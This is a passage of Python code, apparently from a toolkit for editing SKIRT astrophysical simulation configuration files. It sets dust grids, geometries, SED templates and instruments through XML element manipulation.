parent.append(parent.makeelement("LuminosityStellarCompNormalization", attrs))
# Wavelength is defined as an Astropy quantity, use SpectralLuminosityStellarCompNormalization
elif filter_or_wavelength.__class__.__name__ == "Quantity":
# Get element that holds the normalization class
parent = normalization.getparent()
# Remove the old normalization
parent.remove(normalization)
# Make and add the new normalization element
attrs = {"luminosity": str_from_quantity(luminosity), "wavelength": str_from_quantity(filter_or_wavelength)}
parent.append(parent.makeelement("SpectralLuminosityStellarCompNormalization", attrs))
# Invalid filter or wavelength argument
else: raise ValueError("Invalid filter or wavelength")
## This function returns the normalization of the dust component with the specified id
def get_dust_component_normalization(self, component_id):
# Get the dust component
dust_component = self.get_dust_component(component_id)
# Return the normalization
return get_unique_element(dust_component, "normalization")
## This function returns the dust mix for the dust component with the specified id
def get_dust_component_mix(self, component_id):
# Get the dust component
dust_component = self.get_dust_component(component_id)
# Return the dust mix
return get_unique_element(dust_component, "mix")
## This functions sets a THEMIS dust mix model for the dust component with the specified id
def set_dust_component_themis_mix(self, component_id, hydrocarbon_pops=25, enstatite_pops=25, forsterite_pops=25, write_mix=True, write_mean_mix=True, write_size=True):
# Get the dust mix
mix = self.get_dust_component_mix(component_id)
# Get the parent
parent = mix.getparent()
# Remove the old mix
parent.remove(mix)
# Make and add the new mix
attrs = {"writeMix": str_from_bool(write_mix), "writeMeanMix": str_from_bool(write_mean_mix),
"writeSize": str_from_bool(write_size), "hydrocarbonPops": str(hydrocarbon_pops),
"enstatitePops": str(enstatite_pops), "forsteritePops": str(forsterite_pops)}
parent.append(parent.makeelement("ThemisDustMix", attrs))
## This function returns the mass of the dust component with the specified id, as an Astropy quantity
def get_dust_component_mass(self, component_id):
# Get the dust component normalization of the component
normalization = self.get_dust_component_normalization(component_id)
# Check if the normalization is of type 'DustMassDustCompNormalization'
if not normalization.tag == "DustMassDustCompNormalization": raise ValueError("Dust component normalization is not of type 'DustMassDustCompNormalization")
# Get the dust mass and return it as a quantity
return get_quantity(normalization, "dustMass")
## This function sets the mass of the dust component with the specified id. The mass should be an Astropy quantity.
def set_dust_component_mass(self, component_id, mass):
# Get the dust component normalization of the component
normalization = self.get_dust_component_normalization(component_id)
# Check if the normalization is of type 'DustMassDustCompNormalization'
if not normalization.tag == "DustMassDustCompNormalization": raise ValueError("Dust component normalization is not of type 'DustMassDustCompNormalization")
# Set the new dust mass
normalization.set("dustMass", str_from_quantity(mass))
## This function returns the wavelength grid
def get_wavelength_grid(self):
# Get the wavelength grid
return self.get_unique_base_element("wavelengthGrid")
## This function sets the number of wavelength points
def set_nwavelengths(self, value):
# Get the wavelength grid
grid = self.get_wavelength_grid()
# Set the number of points
grid.set("points", str(value))
## This function sets the wavelength grid to a file
def set_file_wavelength_grid(self, filename):
# Get the wavelength grid
wavelength_grid = self.get_wavelength_grid()
# Get the parent
parent = wavelength_grid.getparent()
# Remove the old wavelength grid
parent.remove(wavelength_grid)
# Make and add the new wavelength grid
attrs = {"filename": filename}
parent.append(parent.makeelement("FileWavelengthGrid", attrs))
## This function sets the wavelength grid to a NestedLogWavelengthGrid
def set_nestedlog_wavelength_grid(self, min_lambda, max_lambda, points, min_lambda_sub, max_lambda_sub, points_sub, write):
# Get the wavelength grid
wavelength_grid = self.get_wavelength_grid()
# Get the parent
parent = wavelength_grid.getparent()
# Remove the old wavelength grid
parent.remove(wavelength_grid)
# Make and add the new wavelength grid
attrs = {"minWavelength": str_from_quantity(min_lambda), "maxWavelength": str_from_quantity(max_lambda),
"points": str(points), "minWavelengthSubGrid": str_from_quantity(min_lambda_sub),
"maxWavelengthSubGrid": str_from_quantity(max_lambda_sub), "pointsSubGrid": str(points_sub),
"writeWavelengths": str_from_bool(write)}
parent.append(parent.makeelement("NestedLogWavelengthGrid", attrs))
## This functions sets the wavelength grid to a LogWavelengthGrid
def set_log_wavelength_grid(self, min_lambda, max_lambda, points, write):
# Get the wavelength grid
wavelength_grid = self.get_wavelength_grid()
# Get the parent
parent = wavelength_grid.getparent()
# Remove the old wavelength grid
parent.remove(wavelength_grid)
# Make and add the new wavelength grid
attrs = {"minWavelength": str_from_quantity(min_lambda), "maxWavelength": str_from_quantity(max_lambda),
"points": str(points), "writeWavelengths": str_from_bool(write)}
parent.append(parent.makeelement("LogWavelengthGrid", attrs))
## This function returns the geometry of the stellar component with the specified id
def get_stellar_component_geometry(self, component_id):
# Get the stellar component
stellar_component = self.get_stellar_component(component_id)
# Return the geometry element of the stellar component
return get_unique_element(stellar_component, "geometry")
## This function returns the geometry of the dust component with the specified id
def get_dust_component_geometry(self, component_id):
# Get the dust component
dust_component = self.get_dust_component(component_id)
# Return the geometry element of the dust component
return get_unique_element(dust_component, "geometry")
## This function rotates the geometry of the specified stellar component
def rotate_stellar_component(self, component_id, alpha, beta, gamma):
# alpha: 0 to 360 degrees
# beta: 0 to 180 degrees
# gamma: 0 to 360 degrees
# Get the geomery of the stellar component
geometry = self.get_stellar_component_geometry(component_id)
# Get the parent
parent = geometry.getparent()
# Remove the old geometry
parent.remove(geometry)
# Create the new rotated geometry
attrs = {"euleralpha": str_from_angle(alpha), "eulerbeta": str_from_angle(beta), "eulergamma": str_from_angle(gamma)}
new_geometry = parent.makeelement("RotateGeometryDecorator", attrs)
attrs = {"type": "Geometry"}
geometry_of_new_geometry = new_geometry.makeelement("geometry", attrs)
new_geometry.append(geometry_of_new_geometry)
# Add the original geometry that has to be rotated
geometry_of_new_geometry.append(geometry)
# Add the new geometry to the parent
parent.append(new_geometry)
## This function rotates the geometry of the specified dust component
def rotate_dust_component(self, component_id, alpha, beta, gamma):
# alpha: 0 to 360 degrees
# beta: 0 to 180 degrees
# gamma: 0 to 360 degrees
# Get the geomery of the dust component
geometry = self.get_dust_component_geometry(component_id)
# Get the parent
parent = geometry.getparent()
# Remove the old geometry
parent.remove(geometry)
# Create the new rotated geometry
attrs = {"euleralpha": str_from_angle(alpha), "eulerbeta": str_from_angle(beta), "eulergamma": str_from_angle(gamma)}
new_geometry = parent.makeelement("RotateGeometryDecorator", attrs)
attrs = {"type": "Geometry"}
geometry_of_new_geometry = new_geometry.makeelement("geometry", attrs)
new_geometry.append(geometry_of_new_geometry)
# Add the original geometry that has to be rotated
geometry_of_new_geometry.append(geometry)
# Add the new geometry to the parent
parent.append(new_geometry)
## This function sets the geometry of the specified stellar component to a FITS file
def set_stellar_component_fits_geometry(self, component_id, filename, pixelscale, position_angle, inclination, x_size, y_size, x_center, y_center, scale_height):
# Get the stellar component geometry
geometry = self.get_stellar_component_geometry(component_id)
# Get the parent
parent = geometry.getparent()
# Remove the old geometry
parent.remove(geometry)
# Create and add the new geometry
attrs = {"filename": filename, "pixelScale": str(pixelscale), "positionAngle": str_from_angle(position_angle),
"inclination": str_from_angle(inclination), "xelements": str(x_size), "yelements": str(y_size),
"xcenter": str(x_center), "ycenter": str(y_center), "axialScale": str(scale_height)}
new_geometry = parent.makeelement("ReadFitsGeometry", attrs)
parent.append(new_geometry)
## This function sets the geometry of the specified dust component to a FITS file
def set_dust_component_fits_geometry(self, component_id, filename, pixelscale, position_angle, inclination, x_size, y_size, x_center, y_center, scale_height):
# Get the dust component geometry
geometry = self.get_dust_component_geometry(component_id)
# Get the parent
parent = geometry.getparent()
# Remove the old geometry
parent.remove(geometry)
# Create and add the new geometry
attrs = {"filename": filename, "pixelScale": str(pixelscale), "positionAngle": str_from_angle(position_angle),
"inclination": str_from_angle(inclination), "xelements": str(x_size), "yelements": str(y_size),
"xcenter": str(x_center), "ycenter": str(y_center), "axialScale": str(scale_height)}
new_geometry = parent.makeelement("ReadFitsGeometry", attrs)
parent.append(new_geometry)
## This function sets the geometry of the specified stellar component.
def set_stellar_component_geometry(self, component_id, model):
from astropy.coordinates import Angle
from ...modeling.basics.models import SersicModel, ExponentialDiskModel, DeprojectionModel
# Rotation:
# alpha: 0 to 360 degrees
# beta: 0 to 180 degrees
# gamma: 0 to 360 degrees
# Sersic model
if isinstance(model, SersicModel):
# Set the Sersic geometry (with flattening)
self.set_stellar_component_sersic_geometry(component_id, model.index, model.effective_radius, z_flattening=model.flattening)
# Rotate the Sersic geometry with the tilt angle
alpha = Angle(0.0, "deg")
beta = model.tilt
gamma = Angle(0.0, "deg")
if beta < Angle(0.0, "deg"): # beta must be between 0 and 180 degrees, if beta is negative, rotate over z axis with 180 degrees first
alpha = Angle(180, "deg")
beta = - beta
self.rotate_stellar_component(component_id, alpha, beta, gamma)
# Exponential Disk
elif isinstance(model, ExponentialDiskModel):
# Set the exponential disk geometry
radial_scale = model.radial_scale
axial_scale = model.axial_scale
radial_truncation = model.radial_truncation
axial_truncation = model.axial_truncation
inner_radius = model.inner_radius
self.set_stellar_component_expdisk_geometry(component_id, radial_scale, axial_scale, radial_truncation, axial_truncation, inner_radius)
# Rotate the exponential disk geometry with the tilt angle
alpha = Angle(0.0, "deg")
beta = model.tilt
print("beta", beta)
gamma = Angle(0.0, "deg")
if beta < Angle(0.0, "deg"): # beta must be between 0 and 180 degrees, if beta is negative, rotate over z axis with 180 degrees first
alpha = Angle(180, "deg")
beta = - beta
print(alpha, beta, gamma)
self.rotate_stellar_component(component_id, alpha, beta, gamma)
# Deprojection model
elif isinstance(model, DeprojectionModel):
# Set the ReadFitsGeometry
filename = model.filename
scale = model.pixelscale
pa = model.position_angle
i = model.inclination
nx = model.x_size
ny = model.y_size
xc = model.x_center
yc = model.y_center
hz = model.scale_height
self.set_stellar_component_fits_geometry(component_id, filename, scale, pa, i, nx, ny, xc, yc, hz)
# Unsupported model
else: raise ValueError("Models other than SersicModel, ExponentialDiskModel and DeprojectionModel are not supported yet")
## This function sets the geometry of the specified dust component
def set_dust_component_geometry(self, component_id, model):
from astropy.coordinates import Angle
from ...modeling.basics.models import SersicModel, ExponentialDiskModel, DeprojectionModel
# Rotation:
# alpha: 0 to 360 degrees
# beta: 0 to 180 degrees
# gamma: 0 to 360 degrees
# Sersic model
if isinstance(model, SersicModel):
# Set the Sersic geometry (with flattening)
self.set_dust_component_sersic_geometry(component_id, model.index, model.effective_radius, z_flattening=model.flattening)
# Rotate the Sersic geometry with the tilt angle
alpha = Angle(0.0, "deg")
beta = model.tilt
gamma = Angle(0.0, "deg")
if beta < Angle(0.0, "deg"): # beta must be between 0 and 180 degrees, if beta is negative, rotate over z axis with 180 degrees first
alpha = Angle(180, "deg")
beta = - beta
self.rotate_dust_component(component_id, alpha, beta, gamma)
# Exponential Disk
elif isinstance(model, ExponentialDiskModel):
# Set the exponential disk geometry
radial_scale = model.radial_scale
axial_scale = model.axial_scale
radial_truncation = model.radial_truncation
axial_truncation = model.axial_truncation
inner_radius = model.inner_radius
self.set_dust_component_expdisk_geometry(component_id, radial_scale, axial_scale, radial_truncation, axial_truncation, inner_radius)
# Rotate the exponential disk geometry with the tilt angle
alpha = Angle(0.0, "deg")
beta = model.tilt
print("beta", beta)
gamma = Angle(0.0, "deg")
if beta < Angle(0.0, "deg"): # beta must be between 0 and 180 degrees, if beta is negative, rotate over z axis with 180 degrees first
alpha = Angle(180, "deg")
beta = - beta
print(alpha, beta, gamma)
self.rotate_dust_component(component_id, alpha, beta, gamma)
# Deprojection model
elif isinstance(model, DeprojectionModel):
# Set the ReadFitsGeometry
filename = model.filename
scale = model.pixelscale
pa = model.position_angle
i = model.inclination
nx = model.x_size
ny = model.y_size
xc = model.x_center
yc = model.y_center
hz = model.scale_height
self.set_dust_component_fits_geometry(component_id, filename, scale, pa, i, nx, ny, xc, yc, hz)
# Unsupported model
else: raise ValueError("Models other than SersicModel, ExponentialDiskModel and DeprojectionModel are not supported yet")
## This function sets the geometry of the specified stellar component to a Sersic profile with an specific y and z flattening
def set_stellar_component_sersic_geometry(self, component_id, index, radius, y_flattening=1, z_flattening=1):
# Get the stellar component geometry
geometry = self.get_stellar_component_geometry(component_id)
# Get the parent
parent = geometry.getparent()
# Remove the old geometry
parent.remove(geometry)
# Create and add the new geometry
attrs = {"yFlattening": str(y_flattening), "zFlattening": str(z_flattening)}
new_geometry = parent.makeelement("TriaxialGeometryDecorator", attrs)
attrs = {"type": "SpheGeometry"}
geometry_of_new_geometry = new_geometry.makeelement("geometry", attrs)
new_geometry.append(geometry_of_new_geometry)
# Add sersic profile to the geometry
attrs = {"index": str(index), "radius": str(radius)}
sersic_geometry = geometry_of_new_geometry.makeelement("SersicGeometry", attrs)
geometry_of_new_geometry.append(sersic_geometry)
# Add the new geometry
parent.append(new_geometry)
## This function sets the geometry of the specified dust component to a Sersic profile with a specific y and z flattening
def set_dust_component_sersic_geometry(self, component_id, index, radius, y_flattening=1, z_flattening=1):
# Get the dust component geometry
geometry = self.get_dust_component_geometry(component_id)
# Get the parent
parent = geometry.getparent()
# Remove the old geometry
parent.remove(geometry)
# Create and add the new geometry
attrs = {"yFlattening": str(y_flattening), "zFlattening": str(z_flattening)}
new_geometry = parent.makeelement("TriaxialGeometryDecorator", attrs)
attrs = {"type": "SpheGeometry"}
geometry_of_new_geometry = new_geometry.makeelement("geometry", attrs)
new_geometry.append(geometry_of_new_geometry)
# Add sersic profile to the geometry
attrs = {"index": str(index), "radius": str(radius)}
sersic_geometry = geometry_of_new_geometry.makeelement("SersicGeometry", attrs)
geometry_of_new_geometry.append(sersic_geometry)
# Add the new geometry
parent.append(new_geometry)
## This function sets the geometry of the specified stellar component to an exponential disk profile
def set_stellar_component_expdisk_geometry(self, component_id, radial_scale, axial_scale, radial_truncation=0, axial_truncation=0, inner_radius=0):
# Get the stellar component geometry
geometry = self.get_stellar_component_geometry(component_id)
# Get the parent
parent = geometry.getparent()
# Remove the old geometry
parent.remove(geometry)
# Create and add the new exponential disk geometry
attrs = {"radialScale": str(radial_scale), "axialScale": str(axial_scale), "radialTrunc": str(radial_truncation), "axialTrunc": str(axial_truncation), "innerRadius": str(inner_radius)}
new_geometry = parent.makeelement("ExpDiskGeometry", attrs)
# Add the new geometry
parent.append(new_geometry)
## This function sets the geometry of the specified dust component to an exponential disk profile
def set_dust_component_expdisk_geometry(self, component_id, radial_scale, axial_scale, radial_truncation=0, axial_truncation=0, inner_radius=0):
# Get the dust component geometry
geometry = self.get_dust_component_geometry(component_id)
# Get the parent
parent = geometry.getparent()
# Remove the old geometry
parent.remove(geometry)
# Create and add the new exponential disk geometry
attrs = {"radialScale": str(radial_scale), "axialScale": str(axial_scale), "radialTrunc": str(radial_truncation), "axialTrunc": str(axial_truncation), "innerRadius": str(inner_radius)}
new_geometry = parent.makeelement("ExpDiskGeometry", attrs)
# Add the new geometry
parent.append(new_geometry)
## This function returns the SED template of the specified stellar component
def get_stellar_component_sed(self, component_id):
# Get the stellar component
component = self.get_stellar_component(component_id)
# Get the SED element
return get_unique_element(component, "sed")
## This function sets the SED template of the specified stellar component to a certain model with a specific age
# and metallicity (but not MAPPINGS SED)
def set_stellar_component_sed(self, component_id, template, age, metallicity):
# The name of the template class in SKIRT
template_class = template + "SED"
# Get the stellar component SED
sed = self.get_stellar_component_sed(component_id)
# Get the parent
parent = sed.getparent()
# Remove the old SED element
parent.remove(sed)
# Create and add the new geometry
attrs = {"age": str(age), "metallicity": str(metallicity)}
parent.append(parent.makeelement(template_class, attrs))
## This function sets a MAPPINGS SED template for the stellar component with the specified id
def set_stellar_component_mappingssed(self, component_id, metallicity, compactness, pressure, covering_factor):
# Get the stellar component SED
sed = self.get_stellar_component_sed(component_id)
# Get the parent
parent = sed.getparent()
# Remove the old SED element
parent.remove(sed)
# Create and add the new geometry
attrs = {"metallicity": str(metallicity), "compactness": str(compactness), "pressure": str_from_quantity(pressure), "coveringFactor": str(covering_factor)}
parent.append(parent.makeelement("MappingsSED", attrs))
## This function returns the dust emissivity
def get_dust_emissivity(self):
# Get the dust system
dust_system = self.get_dust_system()
# Return the dust emissivity element
return get_unique_element(dust_system, "dustEmissivity")
## This function sets a transient dust emissivity for the simulation
def set_transient_dust_emissivity(self):
# Get the dust emissivity
emissivity = self.get_dust_emissivity()
# Get the parent
parent = emissivity.getparent()
# Remove the old emissivity
parent.remove(emissivity)
# Create and add the new emissivity
parent.append(parent.makeelement("TransientDustEmissivity", {}))
## This function returns the dust library
def get_dust_lib(self):
# Get the dust system
dust_system = self.get_dust_system()
# Return the dust lib element
return get_unique_element(dust_system, "dustLib")
## This function sets the dust library to an AllCellsDustLib
def set_allcells_dust_lib(self):
# Get the dust lib
lib = self.get_dust_lib()
# Get the parent
parent = lib.getparent()
# Remove the old DustLib element
parent.remove(lib)
# Create and add the new library
parent.append(parent.makeelement("AllCellsDustLib", {}))
## This function sets the dust library to a 2D dust library
def set_2d_dust_lib(self, temperature_points=25, wavelength_points=10):
# Get the dust lib
lib = self.get_dust_lib()
# Get the parent
parent = lib.getparent()
# Remove the old DustLib element
parent.remove(lib)
# Create and add the new library
attrs = {"pointsTemperature": str(temperature_points), "pointsWavelength": str(wavelength_points)}
parent.append(parent.makeelement("Dim2DustLib", attrs))
## This function sets the dust library to a 1D dust library
def set_1d_dust_lib(self, points):
# Get the dust lib
lib = self.get_dust_lib()
# Get the parent
parent = lib.getparent()
# Remove the old DustLib element
parent.remove(lib)
# Create and add the new library
attrs = {"entries": str(points)}
parent.append(parent.makeelement("Dim1DustLib", attrs))
## This function returns the dust grid
def get_dust_grid(self):
# Get the dust system
dust_system = self.get_dust_system()
# Return the dust grid
return get_unique_element(dust_system, "dustGrid")
## This function sets the dust grid
def set_dust_grid(self, grid):
from ...modeling.basics.grids import BinaryTreeDustGrid, OctTreeDustGrid, CartesianDustGrid
if isinstance(grid, CartesianDustGrid):
# Set cartesian dust grid
self.set_cartesian_dust_grid(grid.min_x, grid.max_x, grid.min_y, grid.max_y, grid.min_z, grid.max_z,
grid.x_bins, grid.y_bins, grid.mesh_type, grid.ratio, grid.write)
elif isinstance(grid, BinaryTreeDustGrid):
# Set binary tree dust grid
self.set_binary_tree_dust_grid(grid.min_x, grid.max_x, grid.min_y, grid.max_y, grid.min_z, grid.max_z,
grid.write, grid.min_level, grid.max_level, grid.search_method,
grid.sample_count, grid.max_optical_depth, grid.max_mass_fraction,
grid.max_dens_disp_fraction, grid.direction_method)
elif isinstance(grid, OctTreeDustGrid):
# Set octtree dust grid
self.set_octtree_dust_grid(grid.min_x, grid.max_x, grid.min_y, grid.max_y, grid.min_z, grid.max_z,
grid.write, grid.min_level, grid.max_level, grid.search_method,
grid.sample_count, grid.max_optical_depth, grid.max_mass_fraction,
grid.max_dens_disp_fraction, grid.barycentric)
else: raise ValueError("Invalid grid type")
## This function sets a cartesian dust grid for the dust system
def set_cartesian_dust_grid(self, min_x, max_x, min_y, max_y, min_z, max_z, x_bins, y_bins, z_bins, mesh_type="linear", ratio=1., write_grid=True):
# Get the dust grid
grid = self.get_dust_grid()
# Get the parent
parent = grid.getparent()
# Remove the old grid element
parent.remove(grid)
# Create and add the new grid
attrs = {"minX": str_from_quantity(min_x), "maxX": str_from_quantity(max_x), "minY": str_from_quantity(min_y),
"maxY": str_from_quantity(max_y), "minZ": str_from_quantity(min_z), "maxZ": str_from_quantity(max_z),
"writeGrid": str_from_bool(write_grid)}
grid = parent.makeelement("CartesianDustGrid", attrs)
parent.append(grid)
# Create the X mesh
attrs = {"type": "MoveableMesh"}
x_mesh = grid.makeelement("meshX", attrs)
grid.append(x_mesh)
if mesh_type == "linear":
attrs = {"numBins": str(x_bins)}
x_mesh.append(x_mesh.makeelement("LinMesh", attrs))
elif mesh_type == "power":
attrs = {"numBins": str(x_bins), "ratio": str(ratio)}
x_mesh.append(x_mesh.makeelement("PowMesh", attrs))
elif mesh_type == "symmetric_power":
attrs = {"numBins": str(x_bins), "ratio": str(ratio)}
x_mesh.append(x_mesh.makeelement("SymPowMesh", attrs))
else: raise ValueError("Unrecognized mesh type")
# Create the Y mesh
attrs = {"type": "MoveableMesh"}
y_mesh = grid.makeelement("meshY", attrs)
grid.append(y_mesh)
if mesh_type == "linear":
attrs = {"numBins": str(y_bins)}
y_mesh.append(y_mesh.makeelement("LinMesh", attrs))
elif mesh_type == "power":
attrs = {"numBins": str(y_bins), "ratio": str(ratio)}
y_mesh.append(y_mesh.makeelement("PowMesh", attrs))
elif mesh_type == "symmetric_power":
attrs = {"numBins": str(z_bins), "ratio": str(ratio)}
y_mesh.append(y_mesh.makeelement("SymPowMesh", attrs))
else: raise ValueError("Unrecognized mesh type")
# Create the Z mesh
attrs = {"type": "MovableMesh"}
z_mesh = grid.makeelement("meshZ", attrs)
grid.append(z_mesh)
if mesh_type == "linear":
attrs = {"numBins": str(z_bins)}
z_mesh.append(z_mesh.makeelement("LinMesh", attrs))
elif mesh_type == "power":
attrs = {"numBins": str(z_bins), "ratio": str(ratio)}
y_mesh.append(z_mesh.makeelement("PowMesh", attrs))
elif mesh_type == "symmetric_power":
attrs = {"numBins": str(z_bins), "ratio": str(ratio)}
z_mesh.append(z_mesh.makeelement("SymPowMesh", attrs))
else: raise ValueError("Unrecognized mesh type")
## This function sets a binary tree dust grid for the dust system
def set_binary_tree_dust_grid(self, min_x, max_x, min_y, max_y, min_z, max_z, write_grid=True, min_level=2,
max_level=10, search_method="Neighbor", sample_count=100, max_optical_depth=0,
max_mass_fraction=1e-6, max_dens_disp_fraction=0, direction_method="Alternating",
assigner="IdenticalAssigner"):
# Get the dust grid
grid = self.get_dust_grid()
# Get the parent
parent = grid.getparent()
# Remove the old grid element
parent.remove(grid)
# Create and add the new grid
attrs = {"minX": str(min_x), "maxX": str(max_x), "minY": str(min_y), "maxY": str(max_y), "minZ": str(min_z),
"maxZ": str(max_z), "writeGrid": str_from_bool(write_grid), "minLevel": str(min_level),
"maxLevel": str(max_level), "searchMethod": search_method, "sampleCount": str(sample_count),
"maxOpticalDepth": str(max_optical_depth), "maxMassFraction": str(max_mass_fraction),
"maxDensDispFraction": str(max_dens_disp_fraction), "directionMethod": direction_method}
#"assigner": assigner}
parent.append(parent.makeelement("BinTreeDustGrid", attrs))
## This function sets the maximal optical depth
def set_binary_tree_max_optical_depth(self, value):
# Get the dust grid
grid = self.get_dust_grid()
if grid.tag != "BinTreeDustGrid": raise ValueError("The ski file does not specify a binary tree dust grid")
# Set the optical depth
grid.set("maxOpticalDepth", str(value))
## This function sets the maximal mass fraction
def set_binary_tree_max_mass_fraction(self, value):
# Get the dust grid
grid = self.get_dust_grid()
if grid.tag != "BinTreeDustGrid": raise ValueError("The ski file does not specify a binary tree dust grid")
# Set the max mass fraction
grid.set("maxMassFraction", str(value))
## This function sets an octtree dust grid for the dust system
def set_octtree_dust_grid(self, min_x, max_x, min_y, max_y, min_z, max_z, write_grid=True, min_level=2,
max_level=6, search_method="Neighbor", sample_count=100, max_optical_depth=0,
max_mass_fraction=1e-6, max_dens_disp_fraction=0, barycentric=False,
assigner="IdenticalAssigner"):
# Get the dust grid
grid = self.get_dust_grid()
# Get the parent
parent = grid.getparent()
# Remove the old grid element
parent.remove(grid)
# Create and add the new grid
attrs = {"minX": str(min_x), "maxX": str(max_x), "minY": str(min_y), "maxY": str(max_y), "minZ": str(min_z),
"maxZ": str(max_z), "writeGrid": str_from_bool(write_grid), "minLevel": str(min_level),
"maxLevel": str(max_level), "searchMethod": search_method, "sampleCount": sample_count,
"maxOpticalDepth": str(max_optical_depth), "maxMassFraction": str(max_mass_fraction),
"maxDensDispFraction": str(max_dens_disp_fraction), "barycentric": str_from_bool(barycentric)}
#"assigner": assigner}
parent.append(parent.makeelement("OctTreeDustGrid", attrs))
## This function returns the instrument system
def get_instrument_system(self):
return self.get_unique_base_element("instrumentSystem")
## This funcion removes the complete instrument system
def remove_instrument_system(self):
instrument_system = self.get_instrument_system()
parent = instrument_system.getparent()
parent.getparent().remove(parent)
## This function returns a list of the instruments in the ski file, or the 'instruments' element if as_list is False
def get_instruments(self, as_list=True):
# Get the instrument system
instrument_system = self.get_instrument_system()
# Get the 'instruments' element
instruments_parents = instrument_system.xpath("instruments")
# Check if only one 'instruments' element is present
if len(instruments_parents) == 0: raise ValueError("No instruments found")
elif len(instruments_parents) > 1: raise ValueError("Invalid ski file: multiple 'instruments' objects within instrument system")
instruments_element = instruments_parents[0]
# Return the instruments as a list
if as_list: return instruments_element.getchildren()
else: return instruments_element
## This function returns the names of all the instruments in the ski file as a list
def get_instrument_names(self):
# Initialize a list to contain the names
names = []
# Get the list of instruments
instruments = self.get_instruments()
# Loop over the instruments
for instrument in instruments:
# Get the instrument name
instrument_name = instrument.get("instrumentName")
# Add the name to the list
names.append(instrument_name)
# Return the list of names
return names
## This function removes the instrument with the specified name
def remove_instrument(self, name):
# Get the instrument with the specified name
instrument = self.get_instrument(name)
# Get element that holds the instrument class
parent = instrument.getparent()
# Remove the instrument
parent.remove(instrument)
## This function removes all instruments
def remove_all_instruments(self):
for name in self.get_instrument_names():
self.remove_instrument(name)
## This function adds an instrument
def add_instrument(self, name, instrument):
from ...modeling.basics.instruments import SEDInstrument, FrameInstrument, SimpleInstrument, FullInstrument
distance = instrument.distance
inclination = instrument.inclination
azimuth = instrument.azimuth
position_angle = instrument.position_angle
if isinstance(instrument, SEDInstrument):
# Add the SED instrument to the ski file
self.add_sed_instrument(name, distance, inclination, azimuth, position_angle)
elif isinstance(instrument, FrameInstrument):
field_x = instrument.field_x
field_y = instrument.field_y
pixels_x = instrument.pixels_x
pixels_y = instrument.pixels_y
center_x = instrument.center_x
center_y = instrument.center_y
# Add the simple instrument to the ski file
self.add_frame_instrument(name, distance, inclination, azimuth, position_angle, field_x, field_y, pixels_x, pixels_y, center_x, center_y)
elif isinstance(instrument, SimpleInstrument):
field_x = instrument.field_x
field_y = instrument.field_y
pixels_x = instrument.pixels_x
pixels_y = instrument.pixels_y
center_x = instrument.center_x
center_y = instrument.center_y
# Add the simple instrument to the ski file
self.add_simple_instrument(name, distance, inclination, azimuth, position_angle, field_x, field_y, pixels_x, pixels_y, center_x, center_y)
elif isinstance(instrument, FullInstrument):
field_x = instrument.field_x
field_y = instrument.field_y
pixels_x = instrument.pixels_x
pixels_y = instrument.pixels_y
center_x = instrument.center_x
center_y = instrument.center_y
# Add the full instrument to the ski file
self.add_full_instrument(name, distance, inclination, azimuth, position_angle, field_x, field_y, pixels_x, pixels_y, center_x, center_y)
else: raise ValueError("Instruments other than SimpleInstrument, SEDInstrument and FullInstrument are not yet supported")
## This function adds a FrameInstrument to the instrument system
def add_frame_instrument(self, name, distance, inclination, azimuth, position_angle, field_x, field_y,
pixels_x, pixels_y, center_x, center_y):
# Get the 'instruments' element
instruments = self.get_instruments(as_list=False)
# Make and add the new FrameInstrument
attrs = {"instrumentName": name, "distance": str(distance), "inclination": str_from_angle(inclination),
"azimuth": str_from_angle(azimuth), "positionAngle": str_from_angle(position_angle),
"fieldOfViewX": str(field_x), "fieldOfViewY": str(field_y), "pixelsX": str(pixels_x),
"pixelsY": str(pixels_y), "centerX": str(center_x), "centerY": str(center_y)}
instruments.append(instruments.makeelement("FrameInstrument", attrs))
## This function adds a FullInstrument to the instrument system
def add_full_instrument(self, name, distance, inclination, azimuth, position_angle, field_x, field_y,
pixels_x, pixels_y, center_x, center_y, scattering_levels=0):
# Get the 'instruments' element
instruments = self.get_instruments(as_list=False)
# Make and add the new FullInstrument
attrs = {"instrumentName": name, "distance": str(distance), "inclination": str_from_angle(inclination),
"azimuth": str_from_angle(azimuth), "positionAngle": str_from_angle(position_angle), "fieldOfViewX": str(field_x),
"fieldOfViewY": str(field_y), "pixelsX": str(pixels_x), "pixelsY": str(pixels_y),
"centerX": str(center_x), "centerY": str(center_y), "scatteringLevels": str(scattering_levels)}
instruments.append(instruments.makeelement("FullInstrument", attrs))
## This function adds a SimpleInstrument to the instrument system
def add_simple_instrument(self, name, distance, inclination, azimuth, position_angle, field_x, field_y,
pixels_x, pixels_y, center_x, center_y):
# Get the 'instruments' element
instruments = self.get_instruments(as_list=False)
# Make and add the new SimpleInstrument
attrs = {"instrumentName": name, "distance": str(distance), "inclination": str_from_angle(inclination),
"azimuth": str_from_angle(azimuth), "positionAngle": str_from_angle(position_angle), "fieldOfViewX": str(field_x),
"fieldOfViewY": str(field_y), "pixelsX": str(pixels_x), "pixelsY": str(pixels_y),
"centerX": str(center_x), "centerY": str(center_y)}
instruments.append(instruments.makeelement("SimpleInstrument", attrs))
## This function adds an SEDInstrument to the instrument system
def add_sed_instrument(self, name, distance, inclination, azimuth, position_angle):
# Get the 'instruments' element
instruments = self.get_instruments(as_list=False)
# Make and add the new SEDInstrument
attrs = {"instrumentName": name, "distance": str(distance), "inclination": str_from_angle(inclination),
"azimuth": str_from_angle(azimuth), "positionAngle": str_from_angle(position_angle)}
instruments.append(instruments.makeelement("SEDInstrument", attrs))
## This function returns the instrument with the specified name
def get_instrument(self, name):
# Get the list of instruments
instruments = self.get_instruments()
# Loop over the instruments
for instrument in instruments:
# Get the instrument name
instrument_name = instrument.get("instrumentName")
# If the name matches, return
if name == instrument_name: return instrument
raise ValueError("No instrument with the name '" + name + "'")
## This function changes the name of the specified instrument
def set_instrument_name(self, old_name, new_name):
# Get the instrument with the specified name
instrument = self.get_instrument(old_name)
# Set the new name
instrument.set("instrumentName", new_name)
## This function returns the distance of the specified instrument as an Astropy quantity
def get_instrument_distance(self, name):
# Get the instrument with this name
instrument = self.get_instrument(name)
# Return the distance
return get_quantity(instrument, "distance")
## This function sets the distance of the specified instruments. The distance should be an Astropy quantity.
def set_instrument_distance(self, name, value):
# Get the instrument with this name
instrument = self.get_instrument(name)
# Set the distance
set_quantity(instrument, "distance", value)
## This function returns the inclination of the specified instrument as an Astropy Angle.
def get_instrument_inclination(self, name):
# Get the instrument with this name
instrument = self.get_instrument(name)
# Return the inclination
return get_quantity(instrument, "inclination")
## This function sets the inclination of the specified instrument. The inclination should be an Astropy Angle or quantity.
def set_instrument_inclination(self, name, value):
# Get the instrument with this name
instrument = self.get_instrument(name)
